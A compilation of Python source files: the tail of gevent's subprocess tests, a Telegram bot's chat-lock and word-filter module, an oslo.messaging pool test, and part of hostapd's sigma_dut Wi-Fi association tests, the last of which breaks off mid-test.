# fails. Removing the close lets it pass under both Python 3 and 2.7.
# If subprocess.Popen._remove_nonblock_flag is changed to a noop, then
# the test fails (as expected) even with the close removed
#os.close(w)
time.sleep(0.1)
self.assertEqual(p.poll(), None)
finally:
if p.poll() is None:
p.kill()
stdin.close()
os.close(w)
def test_issue148(self):
for _ in range(7):
try:
subprocess.Popen('this_name_must_not_exist')
except OSError as ex:
if ex.errno != errno.ENOENT:
raise
else:
raise AssertionError('must fail with ENOENT')
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_keyword_error(self):
try:
subprocess.check_output([sys.executable, '-c', 'import sys; sys.exit(44)'])
except subprocess.CalledProcessError as e: # pylint:disable=no-member
self.assertEqual(e.returncode, 44)
else:
raise AssertionError('must fail with CalledProcessError')
def test_popen_bufsize(self):
# Test that subprocess has unbuffered output by default
# (as the vanilla subprocess module)
if PY3:
# The default changed under python 3.
return
p = subprocess.Popen([sys.executable, '-u', '-c',
'import sys; sys.stdout.write(sys.stdin.readline())'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(b'foobar\n')
r = p.stdout.readline()
self.assertEqual(r, b'foobar\n')
@greentest.ignores_leakcheck
@greentest.skipOnWindows("Not sure why?")
def test_subprocess_in_native_thread(self):
# gevent.subprocess doesn't work from a background
# native thread. See #688
from gevent import monkey
# must be a native thread; defend against monkey-patching
ex = []
Thread = monkey.get_original('threading', 'Thread')
def fn():
with self.assertRaises(TypeError) as exc:
gevent.subprocess.Popen('echo 123', shell=True)
raise AssertionError("Should not be able to construct Popen")
ex.append(exc.exception)
thread = Thread(target=fn)
thread.start()
thread.join()
self.assertEqual(len(ex), 1)
self.assertTrue(isinstance(ex[0], TypeError), ex)
self.assertEqual(ex[0].args[0], 'child watchers are only available on the default loop')
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def __test_no_output(self, kwargs, kind):
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdout=subprocess.PIPE,
**kwargs)
stdout, stderr = proc.communicate()
self.assertIsInstance(stdout, kind)
self.assertIsNone(stderr)
@greentest.skipOnLibuvOnCIOnPyPy("Sometimes segfaults; "
"https://travis-ci.org/gevent/gevent/jobs/327357682")
def test_universal_newlines_text_mode_no_output_is_always_str(self):
# If the file is in universal_newlines mode, we should always get a str when
# there is no output.
# https://github.com/gevent/gevent/pull/939
self.__test_no_output({'universal_newlines': True}, str)
@greentest.skipIf(sys.version_info[:2] < (3, 6), "Need encoding argument")
def test_encoded_text_mode_no_output_is_str(self):
# If the file is in universal_newlines mode, we should always get a str when
# there is no output.
# https://github.com/gevent/gevent/pull/939
self.__test_no_output({'encoding': 'utf-8'}, str)
def test_default_mode_no_output_is_always_str(self):
# If the file is in default mode, we should always get a str when
# there is no output.
# https://github.com/gevent/gevent/pull/939
self.__test_no_output({}, bytes)
@greentest.skipOnWindows("Testing POSIX fd closing")
class TestFDs(unittest.TestCase):
@mock.patch('os.closerange')
@mock.patch('gevent.subprocess._set_inheritable')
@mock.patch('os.close')
def test_close_fds_brute_force(self, close, set_inheritable, closerange):
keep = (
4, 5,
# Leave a hole
# 6,
7,
)
subprocess.Popen._close_fds_brute_force(keep, None)
closerange.assert_has_calls([
mock.call(3, 4),
mock.call(8, subprocess.MAXFD),
])
set_inheritable.assert_has_calls([
mock.call(4, True),
mock.call(5, True),
])
close.assert_called_once_with(6)
@mock.patch('gevent.subprocess.Popen._close_fds_brute_force')
@mock.patch('os.listdir')
def test_close_fds_from_path_bad_values(self, listdir, brute_force):
listdir.return_value = 'Not an Integer'
subprocess.Popen._close_fds_from_path('path', [], 42)
brute_force.assert_called_once_with([], 42)
@mock.patch('os.listdir')
@mock.patch('os.closerange')
@mock.patch('gevent.subprocess._set_inheritable')
@mock.patch('os.close')
def test_close_fds_from_path(self, close, set_inheritable, closerange, listdir):
keep = (
4, 5,
# Leave a hole
# 6,
7,
)
listdir.return_value = ['1', '6', '37']
subprocess.Popen._close_fds_from_path('path', keep, 5)
self.assertEqual([], closerange.mock_calls)
set_inheritable.assert_has_calls([
mock.call(4, True),
mock.call(7, True),
])
close.assert_has_calls([
mock.call(6),
mock.call(37),
])
@mock.patch('gevent.subprocess.Popen._close_fds_brute_force')
@mock.patch('os.path.isdir')
def test_close_fds_no_dir(self, isdir, brute_force):
isdir.return_value = False
subprocess.Popen._close_fds([], 42)
brute_force.assert_called_once_with([], 42)
isdir.assert_has_calls([
mock.call('/proc/self/fd'),
mock.call('/dev/fd'),
])
@mock.patch('gevent.subprocess.Popen._close_fds_from_path')
@mock.patch('gevent.subprocess.Popen._close_fds_brute_force')
@mock.patch('os.path.isdir')
def test_close_fds_with_dir(self, isdir, brute_force, from_path):
isdir.return_value = True
subprocess.Popen._close_fds([7], 42)
self.assertEqual([], brute_force.mock_calls)
from_path.assert_called_once_with('/proc/self/fd', [7], 42)
class RunFuncTestCase(greentest.TestCase):
# Based on code from python 3.6
__timeout__ = greentest.LARGE_TIMEOUT
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError): # pylint:disable=no-member
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c: # pylint:disable=no-member
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
with tempfile.TemporaryFile() as tf:
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
with tempfile.TemporaryFile() as tf:
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
self.run_python(
(
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"
),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
if __name__ == '__main__':
greentest.main()
|
filter.py
|
import modules.core.database as database
#import modules.core.extract as extract
import modules.core.extract as extract
import modules.core.unparse as unparse
import time
import threading
import json
class filter_switch():
def __init__(self,update,context) -> None:
self.update = update
self.context = context
self.msg = None
self.user = None
self.tag_msg = None
self.tag_user = None
self.msg = update.message
self.user = user = self.msg['from_user']
self.chat = chat = self.msg['chat']
self.db = database.bot_db()
try:
self.tag_msg = tag_msg = update.message.reply_to_message
self.tag_user = tag_user = tag_msg['from_user']
self.db.add_user(user=tag_user)
except:
pass
self.db.parse(chat=chat, user=user)
self.chat_id = self.chat["id"]
self.msg_string = self.msg.text
def lock(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
extract.admin_sync(self.update,self.context,db=self.db)
self.db.add_settings(self.chat_id,lock=1)
self.msg.reply_text("Chat Locked !")
def unlock(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
#extract.admin_sync(self.update,self.context,self.db)
unparse.unparse_cls(self.update,self.context).sync()
self.db.add_settings(self.chat_id,lock=0)
self.msg.reply_text("Chat Unlocked !")
def filter_remove(self,word,tell=0):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
self.db.remove_filter(self.chat_id,word)
if tell==1:
if word == '*':
self.msg.reply_text("Cleared filter !")
else:
self.msg.reply_text(word + " removed from filter !")
def filter_add(self,res):
word=None
response=None
delete=0
type=0
try:
ress = res.split(None, 2)
if ress[1] == "reply":
type=1
elif ress[1] == "replydel":
type=1
delete=1
elif ress[1] == "warn":
type=2
elif ress[1] == "warndel":
type=2
delete=1
else:
return
word=ress[0]
response=ress[2]
except:
if type==2:
self.msg.reply_text("Give a response message for warn..")
return
word = res
delete=1 #type=0
chat_id = self.chat_id
filter_list = self.db.get_filter(chat_id)
for i in filter_list:
if word == i[2]:
#database.remove_filter(chat_id,word)
self.filter_remove(word)
break
self.db.add_filter(chat_id=chat_id,word=word,type=type,response=response,delete=delete)
self.msg.reply_text(word + " added to filter !")
def filter_stat(self,res):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
if res == "on":
self.db.add_settings(self.chat_id,filter=1)
self.msg.reply_text("Chat filter active !")
elif res == "off":
self.db.add_settings(self.chat_id,filter=0)
self.msg.reply_text("Chat filter deactivated !")
elif res == "list":
fi_li = self.db.get_filter(self.chat_id)
self.msg.reply_text(fi_li)
#elif res == "stat":
else:
x = 0
for x,y in enumerate(self.db.get_filter(self.chat_id)):
pass
z = self.db.get_settings(self.chat_id)
if z[5] != 0:
z="active"
else:
z="Off"
self.msg.reply_text("Filter currently " + z + " with " + str(x) + " active filters in this chat..")
def router(self):
res = self.msg_string.split(None,1)
if res[0] == "/lock":
self.lock()
elif res[0] == "/unlock":
self.unlock()
elif res[0] == "/filter":
try:
self.filter_stat(res[1])
except:
self.filter_stat("stat")
elif res[0] == "/filteradd":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
try:
self.filter_add(res[1])
except:
ex = "Please use this format : \n'/filteradd <word> <filter-type> <reason/reply-text>'\n\n<word> is the text that the bot has to react to\n<filter-type> is the type of filter, it can be any from ( 'warn', 'reply, 'delete', 'warndel', 'replydel' )\n <reason/reply-text> : is the text bot responds with during reply & warn\n\nEx : '/filteradd beep warndel for using profane words'"
self.msg.reply_text(ex)
elif res[0] == "/filterdel":
self.filter_remove(res[1],1)
def filter_router(update,context):
threading.Thread(target=filter_switch(update,context).router, args=(), daemon=True).start()
|
test_pool.py
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import uuid
import testscenarios
from oslo_messaging._drivers import pool
from oslo_messaging.tests import utils as test_utils
load_tests = testscenarios.load_tests_apply_scenarios
class PoolTestCase(test_utils.BaseTestCase):
_max_size = [
('default_size', dict(max_size=None, n_iters=4)),
('set_max_size', dict(max_size=10, n_iters=10)),
]
_create_error = [
('no_create_error', dict(create_error=False)),
('create_error', dict(create_error=True)),
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._max_size,
cls._create_error)
class TestPool(pool.Pool):
def create(self):
return uuid.uuid4()
class ThreadWaitWaiter(object):
"""A gross hack.
Stub out the condition variable's wait() method and spin until it
has been called by each thread.
"""
def __init__(self, cond, n_threads, stubs):
self.cond = cond
self.stubs = stubs
self.n_threads = n_threads
self.n_waits = 0
self.orig_wait = cond.wait
def count_waits(**kwargs):
self.n_waits += 1
self.orig_wait(**kwargs)
self.stubs.Set(self.cond, 'wait', count_waits)
def wait(self):
while self.n_waits < self.n_threads:
pass
self.stubs.Set(self.cond, 'wait', self.orig_wait)
def test_pool(self):
kwargs = {}
if self.max_size is not None:
kwargs['max_size'] = self.max_size
p = self.TestPool(**kwargs)
if self.create_error:
def create_error():
raise RuntimeError
orig_create = p.create
self.stubs.Set(p, 'create', create_error)
self.assertRaises(RuntimeError, p.get)
self.stubs.Set(p, 'create', orig_create)
objs = []
for i in range(self.n_iters):
objs.append(p.get())
self.assertIsInstance(objs[i], uuid.UUID)
def wait_for_obj():
o = p.get()
self.assertIn(o, objs)
waiter = self.ThreadWaitWaiter(p._cond, self.n_iters, self.stubs)
threads = []
for i in range(self.n_iters):
t = threading.Thread(target=wait_for_obj)
t.start()
threads.append(t)
waiter.wait()
for o in objs:
p.put(o)
for t in threads:
t.join()
for o in objs:
p.put(o)
for o in p.iter_free():
self.assertIn(o, objs)
objs.remove(o)
self.assertEqual([], objs)
PoolTestCase.generate_scenarios()
|
test_sigma_dut.py
|
# Test cases for sigma_dut
# Copyright (c) 2017, Qualcomm Atheros, Inc.
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import logging
logger = logging.getLogger()
import os
import socket
import struct
import subprocess
import threading
import time
import hostapd
from utils import HwsimSkip
from hwsim import HWSimRadio
import hwsim_utils
from test_dpp import check_dpp_capab, update_hapd_config
from test_suite_b import check_suite_b_192_capa, suite_b_as_params, suite_b_192_rsa_ap_params
from test_ap_eap import check_eap_capa
from test_ap_hs20 import hs20_ap_params
def check_sigma_dut():
if not os.path.exists("./sigma_dut"):
raise HwsimSkip("sigma_dut not available")
def sigma_dut_cmd(cmd, port=9000, timeout=2):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.settimeout(timeout)
addr = ('127.0.0.1', port)
sock.connect(addr)
sock.send(cmd + "\r\n")
try:
res = sock.recv(1000)
running = False
done = False
for line in res.splitlines():
if line.startswith("status,RUNNING"):
running = True
elif line.startswith("status,INVALID"):
done = True
elif line.startswith("status,ERROR"):
done = True
elif line.startswith("status,COMPLETE"):
done = True
if running and not done:
# Read the actual response
res = sock.recv(1000)
except:
res = ''
pass
sock.close()
res = res.rstrip()
logger.debug("sigma_dut: '%s' --> '%s'" % (cmd, res))
return res
def sigma_dut_cmd_check(cmd, port=9000, timeout=2):
res = sigma_dut_cmd(cmd, port=port, timeout=timeout)
if "COMPLETE" not in res:
raise Exception("sigma_dut command failed: " + cmd)
return res
def start_sigma_dut(ifname, debug=False, hostapd_logdir=None, cert_path=None,
bridge=None):
check_sigma_dut()
cmd = [ './sigma_dut',
'-M', ifname,
'-S', ifname,
'-F', '../../hostapd/hostapd',
'-G',
'-w', '/var/run/wpa_supplicant/',
'-j', ifname ]
if debug:
cmd += [ '-d' ]
if hostapd_logdir:
cmd += [ '-H', hostapd_logdir ]
if cert_path:
cmd += [ '-C', cert_path ]
if bridge:
cmd += [ '-b', bridge ]
sigma = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
for i in range(20):
try:
res = sigma_dut_cmd("HELLO")
break
except:
time.sleep(0.05)
return sigma
def stop_sigma_dut(sigma):
sigma.terminate()
sigma.wait()
out, err = sigma.communicate()
logger.debug("sigma_dut stdout: " + str(out))
logger.debug("sigma_dut stderr: " + str(err))
def sigma_dut_wait_connected(ifname):
for i in range(50):
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
break
time.sleep(0.2)
if i == 49:
raise Exception("Connection did not complete")
def test_sigma_dut_basic(dev, apdev):
"""sigma_dut basic functionality"""
sigma = start_sigma_dut(dev[0].ifname)
res = sigma_dut_cmd("UNKNOWN")
if "status,INVALID,errorCode,Unknown command" not in res:
raise Exception("Unexpected sigma_dut response to unknown command")
tests = [ ("ca_get_version", "status,COMPLETE,version,1.0"),
("device_get_info", "status,COMPLETE,vendor"),
("device_list_interfaces,interfaceType,foo", "status,ERROR"),
("device_list_interfaces,interfaceType,802.11",
"status,COMPLETE,interfaceType,802.11,interfaceID," + dev[0].ifname) ]
for cmd, response in tests:
res = sigma_dut_cmd(cmd)
if response not in res:
raise Exception("Unexpected %s response: %s" % (cmd, res))
stop_sigma_dut(sigma)
def test_sigma_dut_open(dev, apdev):
"""sigma_dut controlled open network association"""
try:
run_sigma_dut_open(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_open(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
hapd = hostapd.add_ap(apdev[0], { "ssid": "open" })
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_encryption,interface,%s,ssid,%s,encpType,none" % (ifname, "open"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "open"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_psk_pmf(dev, apdev):
"""sigma_dut controlled PSK+PMF association"""
try:
run_sigma_dut_psk_pmf(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_psk_pmf(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "test-pmf-required", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_psk_pmf_bip_cmac_128(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-CMAC-128"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-128", "AES-128-CMAC")
finally:
dev[0].set("ignore_old_scan_res", "0")
def test_sigma_dut_psk_pmf_bip_cmac_256(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-CMAC-256"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-256", "BIP-CMAC-256")
finally:
dev[0].set("ignore_old_scan_res", "0")
def test_sigma_dut_psk_pmf_bip_gmac_128(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-128"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-128", "BIP-GMAC-128")
finally:
dev[0].set("ignore_old_scan_res", "0")
def test_sigma_dut_psk_pmf_bip_gmac_256(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-256"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "BIP-GMAC-256")
finally:
dev[0].set("ignore_old_scan_res", "0")
def test_sigma_dut_psk_pmf_bip_gmac_256_mismatch(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-256 mismatch"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "AES-128-CMAC",
failure=True)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_psk_pmf_cipher(dev, apdev, sigma_cipher, hostapd_cipher,
failure=False):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
params["group_mgmt_cipher"] = hostapd_cipher
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required,GroupMgntCipher,%s" % (ifname, "test-pmf-required", "12345678", sigma_cipher))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"))
if failure:
ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Network selection result not indicated")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
raise Exception("Connection reported")
else:
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_sae(dev, apdev):
"""sigma_dut controlled SAE association"""
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID,20" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '20':
raise Exception("Expected SAE group not used")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_sae_password(dev, apdev):
"""sigma_dut controlled SAE association and long password"""
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['sae_password'] = 100*'B'
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", 100*'B'))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sta_override_rsne(dev, apdev):
"""sigma_dut and RSNE override on STA"""
try:
run_sigma_dut_sta_override_rsne(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_sta_override_rsne(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "test-psk"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
tests = [ "30120100000fac040100000fac040100000fac02",
"30140100000fac040100000fac040100000fac02ffff" ]
for test in tests:
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678"))
sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,%s" % (ifname, test))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678"))
sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,300101" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk"))
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"])
if ev is None:
raise Exception("Association rejection not reported")
if "status_code=40" not in ev:
raise Exception("Unexpected status code: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk(dev, apdev):
"""sigma_dut controlled AP"""
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_pskhex(dev, apdev, params):
"""sigma_dut controlled AP and PSKHEX"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_pskhex.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
psk = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSKHEX," + psk)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", raw_psk=psk, scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sha256(dev, apdev, params):
"""sigma_dut controlled AP PSK SHA256"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sha256.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-256,PSK,12345678")
